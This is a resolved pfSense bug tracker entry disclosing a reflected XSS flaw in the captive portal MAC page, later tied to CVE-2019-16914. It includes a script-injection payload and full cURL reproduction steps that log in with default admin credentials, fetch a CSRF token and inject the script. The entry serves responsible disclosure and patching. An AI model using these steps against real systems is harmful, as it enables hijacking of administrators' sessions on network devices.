Bug #9609
closed
Reflective xss in services_captiveportal_mac.php
100%
Description
in `services_captiveportal_mac.php` parameter username and parameter delmac be displayed without any filter.
you can use payload such as:
```
__csrf_magic={csrf_code}&save=1&postafterlogin=1&delmac=<script>alert(1)</script>
```
Updated by Jim Pingle almost 5 years ago
- Category set to Captive Portal
- Assignee set to Jim Pingle
- Target version set to 2.5.0
- Affected Version set to All
- Affected Architecture All added
- Affected Architecture deleted (
)
I was able to replicate the problem, but there are a couple notable exceptions left out above:
1. There must be at least one Captive Portal zone defined
2. The attacker must know the name of a valid Captive Portal zone
3. There must be at least one pass-through MAC entry defined
To reproduce with cURL:
1. Login:
curl -L -k --cookie-jar cookies.txt \ https://192.168.1.1/ \ | grep "name='__csrf_magic'" \ | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \ --data-urlencode "login=Login" \ --data-urlencode "usernamefld=admin" \ --data-urlencode "passwordfld=pfsense" \ --data-urlencode "__csrf_magic=$(cat csrf.txt)" \ https://192.168.1.1/ > /dev/null
2. Fetch a CSRF token:
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
"https://192.168.1.1/services_captiveportal_mac_edit.php?zone=myzone&id=1" \
| grep "name='__csrf_magic'" \
| sed 's/.*value="\(.*\)".*/\1/' > csrf.txt
3a. Exploit via delmac:
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \ --data-urlencode "zone=myzone" \ --data-urlencode "save=1" \ --data-urlencode "postafterlogin=1" \ --data-urlencode "delmac=<script>alert(1)</script>" \ --data-urlencode "__csrf_magic=$(head -n 1 csrf.txt)" \ https://192.168.1.1/services_captiveportal_mac.php | grep alert No entry exists for this mac address: <script>alert(1)</script>
3b. Exploit via username:
curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \ --data-urlencode "zone=myzone" \ --data-urlencode "save=1" \ --data-urlencode "postafterlogin=1" \ --data-urlencode "username=<script>alert(1)</script>" \ --data-urlencode "__csrf_magic=$(head -n 1 csrf.txt)" \ https://192.168.1.1/services_captiveportal_mac.php | grep alert No entry exists for this username: <script>alert(1)</script>
Updated by Jim Pingle almost 5 years ago
- Status changed from New to Feedback
- % Done changed from 0 to 100
Applied in changeset d31362b69d5d52dc196dc72f66e830cd1e6e9a4f.
Updated by Jim Pingle over 4 years ago
- Target version changed from 2.5.0 to 2.4.5
Updated by Jim Pingle over 4 years ago
- Status changed from Feedback to Resolved
Looks good here. Re-verified against 2.4.4-p3 and confirmed fixed against 2.4.5 and 2.5.0:
2.4.4-p3:
No entry exists for this mac address: <script>alert(1)</script> No entry exists for this username: <script>alert(1)</script>
2.4.5:
No entry exists for this mac address: <script>alert(1)</script> No entry exists for this username: <script>alert(1)</script>
2.5.0:
No entry exists for this mac address: <script>alert(1)</script> No entry exists for this username: <script>alert(1)</script>
Updated by LoRexxar Romer about 4 years ago
Hello,
I request the CVEID CVE-2019-16914.
and my id is LoRexxar@knownsec 404team.
I hope to change my id to this in public information in https://www.netgate.com/assets/downloads/advisories/pfSense-SA-20_03.webgui.asc
Thanks.